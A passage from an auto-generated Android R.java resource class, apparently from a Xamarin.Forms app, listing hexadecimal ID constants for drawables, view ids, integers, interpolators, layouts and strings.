ic_group_collapse_04=0x7f020079; public static final int ic_group_collapse_05=0x7f02007a; public static final int ic_group_collapse_06=0x7f02007b; public static final int ic_group_collapse_07=0x7f02007c; public static final int ic_group_collapse_08=0x7f02007d; public static final int ic_group_collapse_09=0x7f02007e; public static final int ic_group_collapse_10=0x7f02007f; public static final int ic_group_collapse_11=0x7f020080; public static final int ic_group_collapse_12=0x7f020081; public static final int ic_group_collapse_13=0x7f020082; public static final int ic_group_collapse_14=0x7f020083; public static final int ic_group_collapse_15=0x7f020084; public static final int ic_group_expand_00=0x7f020085; public static final int ic_group_expand_01=0x7f020086; public static final int ic_group_expand_02=0x7f020087; public static final int ic_group_expand_03=0x7f020088; public static final int ic_group_expand_04=0x7f020089; public static final int ic_group_expand_05=0x7f02008a; public static final int ic_group_expand_06=0x7f02008b; public static final int ic_group_expand_07=0x7f02008c; public static final int ic_group_expand_08=0x7f02008d; public static final int ic_group_expand_09=0x7f02008e; public static final int ic_group_expand_10=0x7f02008f; public static final int ic_group_expand_11=0x7f020090; public static final int ic_group_expand_12=0x7f020091; public static final int ic_group_expand_13=0x7f020092; public static final int ic_group_expand_14=0x7f020093; public static final int ic_group_expand_15=0x7f020094; public static final int ic_media_pause_dark=0x7f020095; public static final int ic_media_pause_light=0x7f020096; public static final int ic_media_play_dark=0x7f020097; public static final int ic_media_play_light=0x7f020098; public static final int ic_media_stop_dark=0x7f020099; public static final int ic_media_stop_light=0x7f02009a; public static final int ic_mr_button_connected_00_dark=0x7f02009b; public static final int ic_mr_button_connected_00_light=0x7f02009c; public static final int ic_mr_button_connected_01_dark=0x7f02009d; public static final int ic_mr_button_connected_01_light=0x7f02009e; public static final int ic_mr_button_connected_02_dark=0x7f02009f; public static final int ic_mr_button_connected_02_light=0x7f0200a0; public static final int ic_mr_button_connected_03_dark=0x7f0200a1; public static final int ic_mr_button_connected_03_light=0x7f0200a2; public static final int ic_mr_button_connected_04_dark=0x7f0200a3; public static final int ic_mr_button_connected_04_light=0x7f0200a4; public static final int ic_mr_button_connected_05_dark=0x7f0200a5; public static final int ic_mr_button_connected_05_light=0x7f0200a6; public static final int ic_mr_button_connected_06_dark=0x7f0200a7; public static final int ic_mr_button_connected_06_light=0x7f0200a8; public static final int ic_mr_button_connected_07_dark=0x7f0200a9; public static final int ic_mr_button_connected_07_light=0x7f0200aa; public static final int ic_mr_button_connected_08_dark=0x7f0200ab; public static final int ic_mr_button_connected_08_light=0x7f0200ac; public static final int ic_mr_button_connected_09_dark=0x7f0200ad; public static final int ic_mr_button_connected_09_light=0x7f0200ae; public static final int ic_mr_button_connected_10_dark=0x7f0200af; public static final int ic_mr_button_connected_10_light=0x7f0200b0; public static final int ic_mr_button_connected_11_dark=0x7f0200b1; public static final int ic_mr_button_connected_11_light=0x7f0200b2; public static final int ic_mr_button_connected_12_dark=0x7f0200b3; public static final int ic_mr_button_connected_12_light=0x7f0200b4; public static final int ic_mr_button_connected_13_dark=0x7f0200b5; public static final int ic_mr_button_connected_13_light=0x7f0200b6; public static final int ic_mr_button_connected_14_dark=0x7f0200b7; public static final int ic_mr_button_connected_14_light=0x7f0200b8; public static final int ic_mr_button_connected_15_dark=0x7f0200b9; public static final int ic_mr_button_connected_15_light=0x7f0200ba; public static final int ic_mr_button_connected_16_dark=0x7f0200bb; public static final int ic_mr_button_connected_16_light=0x7f0200bc; public static final int ic_mr_button_connected_17_dark=0x7f0200bd; public static final int ic_mr_button_connected_17_light=0x7f0200be; public static final int ic_mr_button_connected_18_dark=0x7f0200bf; public static final int ic_mr_button_connected_18_light=0x7f0200c0; public static final int ic_mr_button_connected_19_dark=0x7f0200c1; public static final int ic_mr_button_connected_19_light=0x7f0200c2; public static final int ic_mr_button_connected_20_dark=0x7f0200c3; public static final int ic_mr_button_connected_20_light=0x7f0200c4; public static final int ic_mr_button_connected_21_dark=0x7f0200c5; public static final int ic_mr_button_connected_21_light=0x7f0200c6; public static final int ic_mr_button_connected_22_dark=0x7f0200c7; public static final int ic_mr_button_connected_22_light=0x7f0200c8; public static final int ic_mr_button_connected_23_dark=0x7f0200c9; public static final int ic_mr_button_connected_23_light=0x7f0200ca; public static final int ic_mr_button_connected_24_dark=0x7f0200cb; public static final int ic_mr_button_connected_24_light=0x7f0200cc; public static final int ic_mr_button_connected_25_dark=0x7f0200cd; public static final int ic_mr_button_connected_25_light=0x7f0200ce; public static final int ic_mr_button_connected_26_dark=0x7f0200cf; public static final int ic_mr_button_connected_26_light=0x7f0200d0; public static final int ic_mr_button_connected_27_dark=0x7f0200d1; public static final int ic_mr_button_connected_27_light=0x7f0200d2; public static final int ic_mr_button_connected_28_dark=0x7f0200d3; public static final int ic_mr_button_connected_28_light=0x7f0200d4; public static final int ic_mr_button_connected_29_dark=0x7f0200d5; public static final int ic_mr_button_connected_29_light=0x7f0200d6; public static final int ic_mr_button_connected_30_dark=0x7f0200d7; public static final int ic_mr_button_connected_30_light=0x7f0200d8; public static final int ic_mr_button_connecting_00_dark=0x7f0200d9; public static final int ic_mr_button_connecting_00_light=0x7f0200da; public static final int ic_mr_button_connecting_01_dark=0x7f0200db; public static final int ic_mr_button_connecting_01_light=0x7f0200dc; public static final int ic_mr_button_connecting_02_dark=0x7f0200dd; public static final int ic_mr_button_connecting_02_light=0x7f0200de; public static final int ic_mr_button_connecting_03_dark=0x7f0200df; public static final int ic_mr_button_connecting_03_light=0x7f0200e0; public static final int ic_mr_button_connecting_04_dark=0x7f0200e1; public static final int ic_mr_button_connecting_04_light=0x7f0200e2; public static final int ic_mr_button_connecting_05_dark=0x7f0200e3; public static final int ic_mr_button_connecting_05_light=0x7f0200e4; public static final int ic_mr_button_connecting_06_dark=0x7f0200e5; public static final int ic_mr_button_connecting_06_light=0x7f0200e6; public static final int ic_mr_button_connecting_07_dark=0x7f0200e7; public static final int ic_mr_button_connecting_07_light=0x7f0200e8; public static final int ic_mr_button_connecting_08_dark=0x7f0200e9; public static final int ic_mr_button_connecting_08_light=0x7f0200ea; public static final int ic_mr_button_connecting_09_dark=0x7f0200eb; public static final int ic_mr_button_connecting_09_light=0x7f0200ec; public static final int ic_mr_button_connecting_10_dark=0x7f0200ed; public static final int ic_mr_button_connecting_10_light=0x7f0200ee; public static final int ic_mr_button_connecting_11_dark=0x7f0200ef; public static final int ic_mr_button_connecting_11_light=0x7f0200f0; public static final int ic_mr_button_connecting_12_dark=0x7f0200f1; public static final int ic_mr_button_connecting_12_light=0x7f0200f2; public static final int ic_mr_button_connecting_13_dark=0x7f0200f3; public static final int ic_mr_button_connecting_13_light=0x7f0200f4; public static final int ic_mr_button_connecting_14_dark=0x7f0200f5; public static final int ic_mr_button_connecting_14_light=0x7f0200f6; public static final int ic_mr_button_connecting_15_dark=0x7f0200f7; public static final int ic_mr_button_connecting_15_light=0x7f0200f8; public static final int ic_mr_button_connecting_16_dark=0x7f0200f9; public static final int ic_mr_button_connecting_16_light=0x7f0200fa; public static final int ic_mr_button_connecting_17_dark=0x7f0200fb; public static final int ic_mr_button_connecting_17_light=0x7f0200fc; public static final int ic_mr_button_connecting_18_dark=0x7f0200fd; public static final int ic_mr_button_connecting_18_light=0x7f0200fe; public static final int ic_mr_button_connecting_19_dark=0x7f0200ff; public static final int ic_mr_button_connecting_19_light=0x7f020100; public static final int ic_mr_button_connecting_20_dark=0x7f020101; public static final int ic_mr_button_connecting_20_light=0x7f020102; public static final int ic_mr_button_connecting_21_dark=0x7f020103; public static final int ic_mr_button_connecting_21_light=0x7f020104; public static final int ic_mr_button_connecting_22_dark=0x7f020105; public static final int ic_mr_button_connecting_22_light=0x7f020106; public static final int ic_mr_button_connecting_23_dark=0x7f020107; public static final int ic_mr_button_connecting_23_light=0x7f020108; public static final int ic_mr_button_connecting_24_dark=0x7f020109; public static final int ic_mr_button_connecting_24_light=0x7f02010a; public static final int ic_mr_button_connecting_25_dark=0x7f02010b; public static final int ic_mr_button_connecting_25_light=0x7f02010c; public static final int ic_mr_button_connecting_26_dark=0x7f02010d; public static final int ic_mr_button_connecting_26_light=0x7f02010e; public static final int ic_mr_button_connecting_27_dark=0x7f02010f; public static final int ic_mr_button_connecting_27_light=0x7f020110; public static final int ic_mr_button_connecting_28_dark=0x7f020111; public static final int ic_mr_button_connecting_28_light=0x7f020112; public static final int ic_mr_button_connecting_29_dark=0x7f020113; public static final int ic_mr_button_connecting_29_light=0x7f020114; public static final int ic_mr_button_connecting_30_dark=0x7f020115; public static final int ic_mr_button_connecting_30_light=0x7f020116; public static final int ic_mr_button_disabled_dark=0x7f020117; public static final int ic_mr_button_disabled_light=0x7f020118; public static final int ic_mr_button_disconnected_dark=0x7f020119; public static final int ic_mr_button_disconnected_light=0x7f02011a; public static final int ic_mr_button_grey=0x7f02011b; public static final int ic_mtrl_chip_checked_black=0x7f02011c; public static final int ic_mtrl_chip_checked_circle=0x7f02011d; public static final int ic_mtrl_chip_close_circle=0x7f02011e; public static final int ic_vol_type_speaker_dark=0x7f02011f; public static final int ic_vol_type_speaker_group_dark=0x7f020120; public static final int ic_vol_type_speaker_group_light=0x7f020121; public static final int ic_vol_type_speaker_light=0x7f020122; public static final int ic_vol_type_tv_dark=0x7f020123; public static final int ic_vol_type_tv_light=0x7f020124; public static final int mr_button_connected_dark=0x7f020125; public static final int mr_button_connected_light=0x7f020126; public static final int mr_button_connecting_dark=0x7f020127; public static final int mr_button_connecting_light=0x7f020128; public static final int mr_button_dark=0x7f020129; public static final int mr_button_light=0x7f02012a; public static final int mr_dialog_close_dark=0x7f02012b; public static final int mr_dialog_close_light=0x7f02012c; public static final int mr_dialog_material_background_dark=0x7f02012d; public static final int mr_dialog_material_background_light=0x7f02012e; public static final int mr_group_collapse=0x7f02012f; public static final int mr_group_expand=0x7f020130; public static final int mr_media_pause_dark=0x7f020131; public static final int mr_media_pause_light=0x7f020132; public static final int mr_media_play_dark=0x7f020133; public static final int mr_media_play_light=0x7f020134; public static final int mr_media_stop_dark=0x7f020135; public static final int mr_media_stop_light=0x7f020136; public static final int mr_vol_type_audiotrack_dark=0x7f020137; public static final int mr_vol_type_audiotrack_light=0x7f020138; public static final int mtrl_snackbar_background=0x7f020139; public static final int mtrl_tabs_default_indicator=0x7f02013a; public static final int navigation_empty_icon=0x7f02013b; public static final int notification_action_background=0x7f02013c; public static final int notification_bg=0x7f02013d; public static final int notification_bg_low=0x7f02013e; public static final int notification_bg_low_normal=0x7f02013f; public static final int notification_bg_low_pressed=0x7f020140; public static final int notification_bg_normal=0x7f020141; public static final int notification_bg_normal_pressed=0x7f020142; public static final int notification_icon_background=0x7f020143; public static final int notification_template_icon_bg=0x7f020148; public static final int notification_template_icon_low_bg=0x7f020149; public static final int notification_tile_bg=0x7f020144; public static final int notify_panel_notification_icon_bg=0x7f020145; public static final int tooltip_frame_dark=0x7f020146; public static final int tooltip_frame_light=0x7f020147; } public static final class id { public static final int ALT=0x7f0d0041; public static final int CTRL=0x7f0d0042; public static final int FUNCTION=0x7f0d0043; public static final int META=0x7f0d0044; public static final int SHIFT=0x7f0d0045; public static final int SYM=0x7f0d0046; public static final int action0=0x7f0d00eb; public static final int action_bar=0x7f0d0094; public static final int action_bar_activity_content=0x7f0d0001; public static final int action_bar_container=0x7f0d0093; public static final int action_bar_root=0x7f0d008f; public static final int action_bar_spinner=0x7f0d0002; public static final int action_bar_subtitle=0x7f0d0071; public static final int action_bar_title=0x7f0d0070; public static final int action_container=0x7f0d00e8; public static final int action_context_bar=0x7f0d0095; public static final int action_divider=0x7f0d00ef; public static final int action_image=0x7f0d00e9; public static final int action_menu_divider=0x7f0d0003; public static final int action_menu_presenter=0x7f0d0004; public static final int action_mode_bar=0x7f0d0091; public static final int action_mode_bar_stub=0x7f0d0090; public static final int action_mode_close_button=0x7f0d0072; public static final int action_text=0x7f0d00ea; public static final int actions=0x7f0d00f8; public static final int activity_chooser_view_content=0x7f0d0073; public static final int add=0x7f0d0036; public static final int adjust_height=0x7f0d0024; public static final int adjust_width=0x7f0d0025; public static final int alertTitle=0x7f0d0086; public static final int all=0x7f0d006b; public static final int always=0x7f0d0047; public static final int async=0x7f0d006c; public static final int auto=0x7f0d002a; public static final int beginning=0x7f0d003e; public static final int blocking=0x7f0d006d; public static final int bottom=0x7f0d004c; public static final int bottomtab_navarea=0x7f0d00a4; public static final int bottomtab_tabbar=0x7f0d00a5; public static final int browser_actions_header_text=0x7f0d00a7; public static final int browser_actions_menu_item_icon=0x7f0d00a9; public static final int browser_actions_menu_item_text=0x7f0d00aa; public static final int browser_actions_menu_items=0x7f0d00a8; public static final int browser_actions_menu_view=0x7f0d00a6; public static final int buttonPanel=0x7f0d0079; public static final int cancel_action=0x7f0d00ec; public static final int center=0x7f0d0054; public static final int center_horizontal=0x7f0d0058; public static final int center_vertical=0x7f0d0059; public static final int checkbox=0x7f0d008d; public static final int chronometer=0x7f0d00f4; public static final int clip_horizontal=0x7f0d0068; public static final int clip_vertical=0x7f0d0069; public static final int collapseActionView=0x7f0d0048; public static final int container=0x7f0d00ad; public static final int content=0x7f0d0089; public static final int contentPanel=0x7f0d007c; public static final int coordinator=0x7f0d00ae; public static final int custom=0x7f0d0083; public static final int customPanel=0x7f0d0082; public static final int dark=0x7f0d002b; public static final int decor_content_parent=0x7f0d0092; public static final int default_activity_button=0x7f0d0076; public static final int design_bottom_sheet=0x7f0d00b0; public static final int design_menu_item_action_area=0x7f0d00b5; public static final int design_menu_item_action_area_stub=0x7f0d00b4; public static final int design_menu_item_text=0x7f0d00b3; public static final int design_navigation_view=0x7f0d00b2; public static final int disableHome=0x7f0d0030; public static final int edit_query=0x7f0d0096; public static final int end=0x7f0d003f; public static final int end_padder=0x7f0d00fa; public static final int enterAlways=0x7f0d004e; public static final int enterAlwaysCollapsed=0x7f0d004f; public static final int exitUntilCollapsed=0x7f0d0050; public static final int expand_activities_button=0x7f0d0074; public static final int expanded_menu=0x7f0d008c; public static final int fill=0x7f0d0065; public static final int fill_horizontal=0x7f0d006a; public static final int fill_vertical=0x7f0d005a; public static final int filled=0x7f0d0066; public static final int fixed=0x7f0d0063; public static final int flyoutcontent_appbar=0x7f0d00b7; public static final int flyoutcontent_recycler=0x7f0d00b8; public static final int forever=0x7f0d006e; public static final int ghost_view=0x7f0d000a; public static final int group_divider=0x7f0d0088; public static final int home=0x7f0d0005; public static final int homeAsUp=0x7f0d0031; public static final int icon=0x7f0d0078; public static final int icon_group=0x7f0d00f9; public static final int icon_only=0x7f0d0027; public static final int ifRoom=0x7f0d0049; public static final int image=0x7f0d0075; public static final int info=0x7f0d00f5; public static final int italic=0x7f0d006f; public static final int item_touch_helper_previous_elevation=0x7f0d0000; public static final int labeled=0x7f0d0055; public static final int largeLabel=0x7f0d00ac; public static final int left=0x7f0d005b; public static final int light=0x7f0d002c; public static final int line1=0x7f0d001c; public static final int line3=0x7f0d001d; public static final int listMode=0x7f0d002d; public static final int list_item=0x7f0d0077; public static final int main_appbar=0x7f0d00fb; public static final int main_scrollview=0x7f0d00fe; public static final int main_tablayout=0x7f0d00fd; public static final int main_toolbar=0x7f0d00fc; public static final int masked=0x7f0d0105; public static final int media_actions=0x7f0d00ee; public static final int message=0x7f0d00a3; public static final int middle=0x7f0d0040; public static final int mini=0x7f0d0060; public static final int mr_art=0x7f0d00d5; public static final int mr_cast_checkbox=0x7f0d00c6; public static final int mr_cast_close_button=0x7f0d00bf; public static final int mr_cast_group_icon=0x7f0d00ba; public static final int mr_cast_group_name=0x7f0d00bb; public static final int mr_cast_list=0x7f0d00b9; public static final int mr_cast_meta=0x7f0d00be; public static final int mr_cast_meta_art=0x7f0d00c0; public static final int mr_cast_meta_subtitle=0x7f0d00c2; public static final int mr_cast_meta_title=0x7f0d00c1; public static final int mr_cast_route_icon=0x7f0d00c4; public static final int mr_cast_route_name=0x7f0d00c5; public static final int mr_cast_stop_button=0x7f0d00c3; public static final int mr_cast_volume_layout=0x7f0d00c7; public static final int mr_cast_volume_slider=0x7f0d00c8; public static final int mr_chooser_list=0x7f0d00ca; public static final int mr_chooser_route_desc=0x7f0d00cd; public static final int mr_chooser_route_icon=0x7f0d00cb; public static final int mr_chooser_route_name=0x7f0d00cc; public static final int mr_chooser_title=0x7f0d00c9; public static final int mr_close=0x7f0d00d2; public static final int mr_control_divider=0x7f0d00d8; public static final int mr_control_playback_ctrl=0x7f0d00e3; public static final int mr_control_subtitle=0x7f0d00e6; public static final int mr_control_title=0x7f0d00e5; public static final int mr_control_title_container=0x7f0d00e4; public static final int mr_custom_control=0x7f0d00d3; public static final int mr_default_control=0x7f0d00d4; public static final int mr_dialog_area=0x7f0d00cf; public static final int mr_dialog_header_name=0x7f0d00de; public static final int mr_expandable_area=0x7f0d00ce; public static final int mr_group_expand_collapse=0x7f0d00e7; public static final int mr_group_volume_route_name=0x7f0d00bc; public static final int mr_group_volume_slider=0x7f0d00bd; public static final int mr_media_main_control=0x7f0d00d6; public static final int mr_name=0x7f0d00d1; public static final int mr_picker_close_button=0x7f0d00df; public static final int mr_picker_list=0x7f0d00e0; public static final int mr_picker_route_icon=0x7f0d00e1; public static final int mr_picker_route_name=0x7f0d00e2; public static final int mr_playback_control=0x7f0d00d7; public static final int mr_title_bar=0x7f0d00d0; public static final int mr_volume_control=0x7f0d00d9; public static final int mr_volume_group_list=0x7f0d00da; public static final int mr_volume_item_icon=0x7f0d00dc; public static final int mr_volume_slider=0x7f0d00dd; public static final int mtrl_child_content_container=0x7f0d0014; public static final int mtrl_internal_children_alpha_tag=0x7f0d0015; public static final int multiply=0x7f0d0037; public static final int navigation_header_container=0x7f0d00b1; public static final int never=0x7f0d004a; public static final int none=0x7f0d0026; public static final int normal=0x7f0d002e; public static final int notification_background=0x7f0d00f7; public static final int notification_main_column=0x7f0d00f1; public static final int notification_main_column_container=0x7f0d00f0; public static final int outline=0x7f0d0067; public static final int parallax=0x7f0d005e; public static final int parentPanel=0x7f0d007b; public static final int parent_matrix=0x7f0d000b; public static final int pin=0x7f0d005f; public static final int progress_circular=0x7f0d0006; public static final int progress_horizontal=0x7f0d0007; public static final int radio=0x7f0d008e; public static final int right=0x7f0d005c; public static final int right_icon=0x7f0d00f6; public static final int right_side=0x7f0d00f2; public static final int save_image_matrix=0x7f0d000c; public static final int save_non_transition_alpha=0x7f0d000d; public static final int save_scale_type=0x7f0d000e; public static final int screen=0x7f0d0038; public static final int scroll=0x7f0d0051; public static final int scrollIndicatorDown=0x7f0d0081; public static final int scrollIndicatorUp=0x7f0d007d; public static final int scrollView=0x7f0d007e; public static final int scrollable=0x7f0d0064; public static final int search_badge=0x7f0d0098; public static final int search_bar=0x7f0d0097; public static final int search_button=0x7f0d0099; public static final int search_close_btn=0x7f0d009e; public static final int search_edit_frame=0x7f0d009a; public static final int search_go_btn=0x7f0d00a0; public static final int search_mag_icon=0x7f0d009b; public static final int search_plate=0x7f0d009c; public static final int search_src_text=0x7f0d009d; public static final int search_voice_btn=0x7f0d00a1; public static final int select_dialog_listview=0x7f0d00a2; public static final int selected=0x7f0d0056; public static final int shellcontent_appbar=0x7f0d00ff; public static final int shellcontent_scrollview=0x7f0d0101; public static final int shellcontent_toolbar=0x7f0d0100; public static final int shortcut=0x7f0d008a; public static final int showCustom=0x7f0d0032; public static final int showHome=0x7f0d0033; public static final int showTitle=0x7f0d0034; public static final int sliding_tabs=0x7f0d0102; public static final int smallLabel=0x7f0d00ab; public static final int snackbar_action=0x7f0d0016; public static final int snackbar_text=0x7f0d0017; public static final int snap=0x7f0d0052; public static final int snapMargins=0x7f0d0053; public static final int spacer=0x7f0d007a; public static final int split_action_bar=0x7f0d0008; public static final int src_atop=0x7f0d0039; public static final int src_in=0x7f0d003a; public static final int src_over=0x7f0d003b; public static final int standard=0x7f0d0028; public static final int start=0x7f0d005d; public static final int status_bar_latest_event_content=0x7f0d00ed; public static final int stretch=0x7f0d0062; public static final int submenuarrow=0x7f0d008b; public static final int submit_area=0x7f0d009f; public static final int tabMode=0x7f0d002f; public static final int tag_transition_group=0x7f0d001e; public static final int tag_unhandled_key_event_manager=0x7f0d001f; public static final int tag_unhandled_key_listeners=0x7f0d0020; public static final int text=0x7f0d0021; public static final int text2=0x7f0d0022; public static final int textSpacerNoButtons=0x7f0d0080; public static final int textSpacerNoTitle=0x7f0d007f; public static final int textStart=0x7f0d0061; public static final int text_input_password_toggle=0x7f0d00b6; public static final int textinput_counter=0x7f0d0018; public static final int textinput_error=0x7f0d0019; public static final int textinput_helper_text=0x7f0d001a; public static final int time=0x7f0d00f3; public static final int title=0x7f0d0023; public static final int titleDividerNoCustom=0x7f0d0087; public static final int title_template=0x7f0d0085; public static final int toolbar=0x7f0d0103; public static final int top=0x7f0d004d; public static final int topPanel=0x7f0d0084; public static final int touch_outside=0x7f0d00af; public static final int transition_current_scene=0x7f0d000f; public static final int transition_layout_save=0x7f0d0010; public static final int transition_position=0x7f0d0011; public static final int transition_scene_layoutid_cache=0x7f0d0012; public static final int transition_transform=0x7f0d0013; public static final int uniform=0x7f0d003c; public static final int unlabeled=0x7f0d0057; public static final int up=0x7f0d0009; public static final int useLogo=0x7f0d0035; public static final int view_offset_helper=0x7f0d001b; public static final int visible=0x7f0d0104; public static final int volume_item_container=0x7f0d00db; public static final int wide=0x7f0d0029; public static final int withText=0x7f0d004b; public static final int wrap_content=0x7f0d003d; } public static final class integer { public static final int abc_config_activityDefaultDur=0x7f090005; public static final int abc_config_activityShortDur=0x7f090006; public static final int app_bar_elevation_anim_duration=0x7f09000a; public static final int bottom_sheet_slide_duration=0x7f09000b; public static final int cancel_button_image_alpha=0x7f090007; public static final int config_tooltipAnimTime=0x7f090008; public static final int design_snackbar_text_max_lines=0x7f090009; public static final int design_tab_indicator_anim_duration_ms=0x7f09000c; public static final int google_play_services_version=0x7f090000; public static final int hide_password_duration=0x7f09000d; public static final int mr_controller_volume_group_list_animation_duration_ms=0x7f090001; public static final int mr_controller_volume_group_list_fade_in_duration_ms=0x7f090002; public static final int mr_controller_volume_group_list_fade_out_duration_ms=0x7f090003; public static final int mr_update_routes_delay_ms=0x7f090004; public static final int mtrl_btn_anim_delay_ms=0x7f09000e; public static final int mtrl_btn_anim_duration_ms=0x7f09000f; public static final int mtrl_chip_anim_duration=0x7f090010; public static final int mtrl_tab_indicator_anim_duration_ms=0x7f090011; public static final int show_password_duration=0x7f090012; public static final int status_bar_notification_info_maxnum=0x7f090013; } public static final class interpolator { public static final int mr_fast_out_slow_in=0x7f070000; public static final int mr_linear_out_slow_in=0x7f070001; public static final int mtrl_fast_out_linear_in=0x7f070002; public static final int mtrl_fast_out_slow_in=0x7f070003; public static final int mtrl_linear=0x7f070004; public static final int mtrl_linear_out_slow_in=0x7f070005; } public static final class layout { public static final int abc_action_bar_title_item=0x7f040000; public static final int abc_action_bar_up_container=0x7f040001; public static final int abc_action_menu_item_layout=0x7f040002; public static final int abc_action_menu_layout=0x7f040003; public static final int abc_action_mode_bar=0x7f040004; public static final int abc_action_mode_close_item_material=0x7f040005; public static final int abc_activity_chooser_view=0x7f040006; public static final int abc_activity_chooser_view_list_item=0x7f040007; public static final int abc_alert_dialog_button_bar_material=0x7f040008; public static final int abc_alert_dialog_material=0x7f040009; public static final int abc_alert_dialog_title_material=0x7f04000a; public static final int abc_cascading_menu_item_layout=0x7f04000b; public static final int abc_dialog_title_material=0x7f04000c; public static final int abc_expanded_menu_layout=0x7f04000d; public static final int abc_list_menu_item_checkbox=0x7f04000e; public static final int abc_list_menu_item_icon=0x7f04000f; public static final int abc_list_menu_item_layout=0x7f040010; public static final int abc_list_menu_item_radio=0x7f040011; public static final int abc_popup_menu_header_item_layout=0x7f040012; public static final int abc_popup_menu_item_layout=0x7f040013; public static final int abc_screen_content_include=0x7f040014; public static final int abc_screen_simple=0x7f040015; public static final int abc_screen_simple_overlay_action_mode=0x7f040016; public static final int abc_screen_toolbar=0x7f040017; public static final int abc_search_dropdown_item_icons_2line=0x7f040018; public static final int abc_search_view=0x7f040019; public static final int abc_select_dialog_material=0x7f04001a; public static final int abc_tooltip=0x7f04001b; public static final int bottomtablayout=0x7f04001c; public static final int browser_actions_context_menu_page=0x7f04001d; public static final int browser_actions_context_menu_row=0x7f04001e; public static final int design_bottom_navigation_item=0x7f04001f; public static final int design_bottom_sheet_dialog=0x7f040020; public static final int design_layout_snackbar=0x7f040021; public static final int design_layout_snackbar_include=0x7f040022; public static final int design_layout_tab_icon=0x7f040023; public static final int design_layout_tab_text=0x7f040024; public static final int design_menu_item_action_area=0x7f040025; public static final int design_navigation_item=0x7f040026; public static final int design_navigation_item_header=0x7f040027; public static final int design_navigation_item_separator=0x7f040028; public static final int design_navigation_item_subheader=0x7f040029; public static final int design_navigation_menu=0x7f04002a; public static final int design_navigation_menu_item=0x7f04002b; public static final int design_text_input_password_icon=0x7f04002c; public static final int flyoutcontent=0x7f04002d; public static final int mr_cast_dialog=0x7f04002e; public static final int mr_cast_group_item=0x7f04002f; public static final int mr_cast_group_volume_item=0x7f040030; public static final int mr_cast_media_metadata=0x7f040031; public static final int mr_cast_route_item=0x7f040032; public static final int mr_chooser_dialog=0x7f040033; public static final int mr_chooser_list_item=0x7f040034; public static final int mr_controller_material_dialog_b=0x7f040035; public static final int mr_controller_volume_item=0x7f040036; public static final int mr_dialog_header_item=0x7f040037; public static final int mr_picker_dialog=0x7f040038; public static final int mr_picker_route_item=0x7f040039; public static final int mr_playback_control=0x7f04003a; public static final int mr_volume_control=0x7f04003b; public static final int mtrl_layout_snackbar=0x7f04003c; public static final int mtrl_layout_snackbar_include=0x7f04003d; public static final int notification_action=0x7f04003e; public static final int notification_action_tombstone=0x7f04003f; public static final int notification_media_action=0x7f040040; public static final int notification_media_cancel_action=0x7f040041; public static final int notification_template_big_media=0x7f040042; public static final int notification_template_big_media_custom=0x7f040043; public static final int notification_template_big_media_narrow=0x7f040044; public static final int notification_template_big_media_narrow_custom=0x7f040045; public static final int notification_template_custom_big=0x7f040046; public static final int notification_template_icon_group=0x7f040047; public static final int notification_template_lines_media=0x7f040048; public static final int notification_template_media=0x7f040049; public static final int notification_template_media_custom=0x7f04004a; public static final int notification_template_part_chronometer=0x7f04004b; public static final int notification_template_part_time=0x7f04004c; public static final int rootlayout=0x7f04004d; public static final int select_dialog_item_material=0x7f04004e; public static final int select_dialog_multichoice_material=0x7f04004f; public static final int select_dialog_singlechoice_material=0x7f040050; public static final int shellcontent=0x7f040051; public static final int support_simple_spinner_dropdown_item=0x7f040052; public static final int tabbar=0x7f040053; public static final int toolbar=0x7f040054; } public static final class mipmap { public static final int appicon=0x7f030000; } public static final class string { public static final int abc_action_bar_home_description=0x7f0a002a; public static final int abc_action_bar_up_description=0x7f0a002b; public static final int abc_action_menu_overflow_description=0x7f0a002c; public static final int abc_action_mode_done=0x7f0a002d; public static final int abc_activity_chooser_view_see_all=0x7f0a002e; public static final int abc_activitychooserview_choose_application=0x7f0a002f; public static final int abc_capital_off=0x7f0a0030; public static final int abc_capital_on=0x7f0a0031; public static final int abc_font_family_body_1_material=0x7f0a0046; public static final int abc_font_family_body_2_material=0x7f0a0047; public static final int abc_font_family_button_material=0x7f0a0048; public static final int abc_font_family_caption_material=0x7f0a0049; public static final int abc_font_family_display_1_material=0x7f0a004a; public static final int abc_font_family_display_2_material=0x7f0a004b; public static final int abc_font_family_display_3_material=0x7f0a004c; public static final int abc_font_family_display_4_material=0x7f0a004d; public static final int abc_font_family_headline_material=0x7f0a004e; public static final int abc_font_family_menu_material=0x7f0a004f; public static final int abc_font_family_subhead_material=0x7f0a0050; public static final int abc_font_family_title_material=0x7f0a0051; public static final int abc_menu_alt_shortcut_label=0x7f0a0032; public static final int abc_menu_ctrl_shortcut_label=0x7f0a0033; public static final int abc_menu_delete_shortcut_label=0x7f0a0034; public static final int abc_menu_enter_shortcut_label=0x7f0a0035; public static final int abc_menu_function_shortcut_label=0x7f0a0036; public static final int abc_menu_meta_shortcut_label=0x7f0a0037; public static final int abc_menu_shift_shortcut_label=0x7f0a0038; public static final int abc_menu_space_shortcut_label=0x7f0a0039; public static final int abc_menu_sym_shortcut_label=0x7f0a003a; public static final int abc_prepend_shortcut_label=0x7f0a003b; public static final int abc_search_hint=0x7f0a003c; public static final int abc_searchview_description_clear=0x7f0a003d; public static final int abc_searchview_description_query=0x7f0a003e; public static final int abc_searchview_description_search=0x7f0a003f; public static final int abc_searchview_description_submit=0x7f0a0040; public static final int abc_searchview_description_voice=0x7f0a0041; public static final int abc_shareactionprovider_share_with=0x7f0a0042; public static final int abc_shareactionprovider_share_with_application=0x7f0a0043; public static final int abc_toolbar_collapse_description=0x7f0a0044; public static final int appbar_scrolling_view_behavior=0x7f0a0052; public static final int bottom_sheet_behavior=0x7f0a0053; public static final int character_counter_content_description=0x7f0a0054; public static final int character_counter_pattern=0x7f0a0055; public static final int common_google_play_services_enable_button=0x7f0a0001; public static final int common_google_play_services_enable_text=0x7f0a0002; public static final int common_google_play_services_enable_title=0x7f0a0003; public static final int common_google_play_services_install_button=0x7f0a0004; public static final int common_google_play_services_install_text=0x7f0a0005; public static final int common_google_play_services_install_title=0x7f0a0006; public static final int common_google_play_services_notification_channel_name=0x7f0a0007; public static final int common_google_play_services_notification_ticker=0x7f0a0008; public static final int common_google_play_services_unknown_issue=0x7f0a0000; public static final int common_google_play_services_unsupported_text=0x7f0a0009; public static final int common_google_play_services_update_button=0x7f0a000a; public static final int common_google_play_services_update_text=0x7f0a000b; public static final int common_google_play_services_update_title=0x7f0a000c; public static final int common_google_play_services_updating_text=0x7f0a000d; public static final int common_google_play_services_wear_update_text=0x7f0a000e; public static final int common_open_on_phone=0x7f0a000f; public static final int common_signin_button_text=0x7f0a0010; public static final int common_signin_button_text_long=0x7f0a0011; public static final int default_web_client_id=0x7f0a0062; public static final 